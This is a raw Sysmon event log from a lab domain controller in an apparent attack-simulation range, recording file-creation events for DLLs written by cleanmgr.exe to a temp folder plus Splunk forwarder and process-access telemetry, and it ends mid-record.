07:57:49.712{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-memory-l1-1-0.dllMD5=BA6B6729DC95AA60AF31A160E2CB4533,SHA256=AA433713D5D1DB4413E9F5D938C0C452BAE8EB1BF8CD011803464BBD893BBB08,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051333Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.712{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-core-localization-obsolete-l1-2-0.dllMD5=B5727AD79BEBAAB6E6AFA381A28A8E9C,SHA256=C0E101B6BCDDC28A9BA24C7796BBDAAEFC14459E402FD53053F3C23E0D84D040,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051332Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.711{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-localization-l1-2-1.dllMD5=FD9B6F1EA88B7167E6EC227A61B90888,SHA256=2FEF21096468EE5C6BFC88971AFDB4CC07F6C4669375561863B85023C15684AF,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051331Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.710{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-localization-l1-2-0.dllMD5=C8420A86D981BB6AA0D32001D234639E,SHA256=2E93EA8BB070C07C39B7F042B7D9843C4B74B3D4E69C8E33D89B0574B2D1D43D,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051330Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.709{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-libraryloader-l1-1-1.dllMD5=787DCDC02E39A27A63B857FF6E819593,SHA256=91A7DEC7B636C00032D122CA04D4B8653B13E1211C54A4184F3955D2398C2E2E,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051329Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.708{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-libraryloader-l1-1-0.dllMD5=AC90FCC4E819CD2EEED5D09A1FA42BAC,SHA256=2DA68FCBCE619BE5A90501F971467B7A894C6A705659346729E1E4E306EEB7D7,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051328Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.707{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-Core-Kernel32-Private-L1-1-1.dllMD5=E269D033D63A117DA8F3F855B90CCBFD,SHA256=41437C84BF757CC5758BF381600D0DECB00E8F8F56F11765203B7880AC4CDDD0,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051327Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.691{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-Core-Kernel32-Private-L1-1-0.dllMD5=58B0B7C61F098BD1E73E9C156CB38C64,SHA256=C366B92E7048081C7B336CEAB970BAA20AFDAEE2456820AA38360D1429C27669,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051326Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.691{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-kernel32-legacy-l1-1-1.dllMD5=912D93DCBE67A1373D93BACD0174E3ED,SHA256=0B94CB7472E0777AEFC1B3208ADDE41B893B78B3223F515FB86348D3362624C3,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051325Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.691{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-kernel32-legacy-l1-1-0.dllMD5=8E788763C9CDB6E5D1A313C08F7D621E,SHA256=5604FCC803BE14AD10C7A2372FB19BC80D43AD850109A670676982A4EC961473,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051324Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.691{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-io-l1-1-1.dllMD5=DC7E345A08B64DDD90906151E1D566E9,SHA256=ABDC082DAA40FCAF14E4E554DF23CFC48533F5A2157BD540BFEC49EB8E31E403,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051323Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.691{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-io-l1-1-0.dllMD5=A4381D04E233B96B657262DE9B31594C,SHA256=17BE2709D85E6B922BDF5D357FB4CD9416234F8E6685226F5EC776E8B3B5A678,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051322Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.691{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-interlocked-l1-1-0.dllMD5=39646EB20F4366691E3EFF958C99D1D4,SHA256=262D2C2EBAFFA4276F54B05A5A1DA125CC9DCCAF76EAAD3AAF7B23D54EC33C8E,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051321Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.691{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-Core-Heap-Obsolete-L1-1-0.dllMD5=0C5DE8F3B6CC9B44ED0A0556A02F4867,SHA256=D08261783A1749B08F7423923B00FD77E3B44265889B1F550A64239586BC8FC7,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051320Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.691{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-heap-l1-1-0.dllMD5=51EBE577149EABD170684C2668F967ED,SHA256=0091D6C33047D8EF6E0F09E049DF2CABA5EE6B4F5B1870E0A369D3BF6DB72330,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051319Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.691{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-handle-l1-1-0.dllMD5=F83CB23123F3E4885547ED29F2BD2360,SHA256=495A9EC7C50D6D72F209E1F69C9B0C292D8D32FBE79FE675128786F8E351B988,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051318Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.691{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-core-file-l2-1-1.dllMD5=8B79E85DB9AA6D00794E5151455951BB,SHA256=EE600140599138132439FA9FB9FA6B028A9BF2A206A856CCB1106EFF45459C13,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051317Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.691{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-core-file-l2-1-0.dllMD5=455C1AB890C154076E0E23A42F10B6F5,SHA256=DB95D8AA71A8E0A54852C1A83E42267C72E26F2A111AD41146096BF26825FF62,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051316Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.691{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-file-l1-2-1.dllMD5=A9808572063E5A5649EA59F8B40FC7A8,SHA256=D4FD5081924D4B544188A687BD37127E0A38AF310E77C55F6EC22896B95B3C9C,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051315Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.691{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-file-l1-2-0.dllMD5=4438E1D7952A77B7F71FF45EF821814F,SHA256=1C4FA5120E310E49C8112ACB6E594DB2F581AE4B6BA6241EEA4301E0E373959F,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051314Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.691{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-file-l1-1-0.dllMD5=FF5C179E19923B65E650B11283250D50,SHA256=CF84455BC2AADF2960F0AE4D3691BF3032F412578CB2730A27848C6B26D00225,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051313Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.675{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-fibers-l1-1-1.dllMD5=A263189D905386A2A91CD2EB39D3365D,SHA256=7392027920D102DBE4C2C15590CC471063D6B1456CAA797BB71F8973C60B47FC,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051312Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.675{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-fibers-l1-1-0.dllMD5=A1827E232474C845B7A495D1A4CA6169,SHA256=A95088251923F1233CA4F5675457D6D6B2A1601734D4B5451420298491864746,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051311Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.675{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-errorhandling-l1-1-1.dllMD5=E98BCC3FA25D6DB36D50786EF08DBADD,SHA256=7BDA00F42BE64BCC1022EC3000FE2582CDF4CC89083D868ACA9DCE982C98C52C,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051310Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.675{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-errorhandling-l1-1-0.dllMD5=14E8A42D84E459F617344438903680EE,SHA256=1FCB6E1908C13B5184373E83B3C13FCF96B55E4FBBC8AAF4D6E9DA604DB75848,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051309Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.675{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-delayload-l1-1-0.dllMD5=762D2E52FAFE433C50648FC23D7C3E76,SHA256=53238588E10FFAABA96C751D34181BA04A869A0474757E79D9FE82ABC3DC7CFE,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051308Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.675{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-debug-l1-1-1.dllMD5=1652E7B742F30832826B48E62485BFC7,SHA256=0362AFCDFB6CA89CDEE0DACEC94A5E45D6910B5337343149007DE2443050D154,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051307Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.675{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-debug-l1-1-0.dllMD5=E02F6786930435C736D71E9B6B898773,SHA256=4C0F43EAC3834878F16175B17427C0195A3213B7CDF9702447667D703AA29B54,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051306Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.675{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-datetime-l1-1-1.dllMD5=78876D83AA27E510EC3DC3355D034B92,SHA256=44A696C4626AF85EA565D651D7FAF5E21B6EB0C6EE47EE93419D8A7BAD565278,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051305Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.675{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-datetime-l1-1-0.dllMD5=CF9560A4450AC70C51866581802AE8CC,SHA256=A7A23DC37F028D38D2836CE881FCFF1FD066538588B207BBBCC3B1AB96E3AB62,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051304Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.675{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-console-l1-1-0.dllMD5=893E267BD0B91FADAC2A2BAE70FD0400,SHA256=17D17AC0383117E9A14D7687ECAA3B27AF1C71B89687A5C3E5B8761B2E64EDFC,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051303Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.675{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-comm-l1-1-0.dllMD5=C7EC73197892D7F63059C10D19BD5D90,SHA256=768E17ED08111FD22BAAC8FAC00C7DD87F0E57FEFCDAC58CE04B868528B2FDFC,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051302Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.675{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-com-l1-1-0.dllMD5=08A5A3129DCB52F3C4E51EE3C4A827E7,SHA256=3C6549832275052BCC2234CC4433D95407800ED65359F5147C4762EE0C71F712,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051301Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.675{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-base-util-l1-1-0.dllMD5=29CD6DDC6BADE9098B9A4402C6336D62,SHA256=B97C475AA8241C9B674E8C51C387AFAAA7977B036D9E2F7FAFB6CACC11D985BE,IMPHASH=00000000000000000000000000000000truetrue 534500x80000000000000001051300Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.660{466BC892-F5CA-60EB-6E7D-00000000CF01}9644C:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\DismHost.exe 23542300x80000000000000001051299Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.276{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98D94AE3E1A40F5042FDE95B2B90A48D,SHA256=C8138AB8B9E31EDCA8180700FA5A721650A0C7F76DA0509C4CEEBE83B76FD747,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051457Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:50.886{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FAC64A4ED38ECE062477132436226471,SHA256=2A5F85EE8475D75E911B1B54E5CE775A9A6F620927A4BCB5145BCE6F4FF3A054,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051456Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:50.590{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=898E614AB77CC6711C3985022780BB77,SHA256=A277F80A0AB2C765211427930AF32AF79BE15CC043A04F04A2EDAE065CDCB575,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051455Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:50.474{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9638489E830A4EA2B6EA8A28D6EC4177,SHA256=1EBC98F5E2B80355ED2BC7B6AFA3465B213AB97EEE49067E34610D559860C26F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051454Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:50.474{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F5FE-60EB-8B7D-00000000CF01}10092C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051453Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:50.459{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051452Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:50.459{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051451Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:50.459{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051450Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:50.459{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F5FE-60EB-8B7D-00000000CF01}10092C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051449Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:50.459{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051448Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:50.459{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F5FE-60EB-8B7D-00000000CF01}10092C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program 